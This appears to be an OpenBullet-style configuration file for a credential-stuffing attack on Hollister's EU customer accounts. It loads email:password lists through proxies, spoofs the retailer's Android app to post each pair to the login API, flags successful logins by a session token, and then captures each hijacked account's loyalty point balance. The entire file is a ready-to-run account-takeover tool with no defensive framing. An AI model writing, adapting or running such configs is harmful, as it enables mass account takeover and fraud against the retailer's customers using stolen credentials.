[SETTINGS]
{
  "Name": "Hollister EU",
  "SuggestedBots": 50,
  "LastModified": "2018-08-31T03:06:09.7977184+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#POST_LOGIN REQUEST POST "https://www.hollisterco.com/api/ecomm/h-eu/session?cookieAuth=true" AutoRedirect=TRUE 
  CONTENT "{\"termsAccepted\":false,\"password\":\"<PASS>\",\"logonId\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Hollister/5.4.0 (Linux; U; Android 4.4.2; en-pt; SM-G955N Build/NRD90M; samsung) 480X776 samsung SM-G955N" 
  HEADER "Pragma: no-cache" 
  HEADER "Source: mobileApps_Android" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "\"error\"" 
  KEYCHAIN Success OR 
    KEY "ANFToken" 
#REQUEST_DATA REQUEST GET "https://www.hollisterco.com/api/ecomm/h-eu/user" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Hollister/5.4.0 (Linux; U; Android 4.4.2; en-pt; SM-G955N Build/NRD90M; samsung) 480X776 samsung SM-G955N" 
  HEADER "Pragma: no-cache" 
#PARSE_POINTS PARSE "<SOURCE>" JSON "pointBalance" Recursive=FALSE -> CAP "POINT BALANCE" "" "" 
